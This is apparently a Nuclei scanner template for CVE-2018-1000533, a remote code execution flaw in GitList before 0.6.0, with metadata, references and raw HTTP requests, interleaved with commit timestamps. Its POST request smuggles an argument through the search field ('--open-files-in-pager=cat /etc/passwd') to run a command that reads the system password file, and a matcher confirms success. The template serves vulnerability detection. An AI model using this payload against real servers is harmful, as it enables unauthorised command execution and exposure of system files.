2021-06-15 07:28:10 +00:00
id : CVE-2018-1000533
info :
2022-04-11 14:42:35 +00:00
name : GitList < 0.6.0 Remote Code Execution
2021-06-15 07:28:10 +00:00
author : pikpikcu
severity : critical
2022-04-22 10:38:41 +00:00
description : klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
2022-04-11 14:42:35 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
2022-05-17 09:18:12 +00:00
- https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
- https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-1000533
cwe-id : CWE-20
2022-04-11 14:42:35 +00:00
tags : rce,git,cve,cve2018,gitlist
2021-06-15 07:28:10 +00:00
requests :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /{{path}}/tree/a/search HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
query=--open-files-in-pager=cat%20/etc/passwd
extractors :
- type : regex
name : path
group : 1
internal : true
part : body
regex :
- '<span class="name">(.*?)</span>'
matchers :
2021-06-15 10:53:59 +00:00
- type : word
words :
2021-06-15 07:28:10 +00:00
- "root:/root:/bin/bash"
2021-06-15 11:08:28 +00:00
part : body
2022-04-11 14:42:35 +00:00
# Enhanced by mp on 2022/04/08
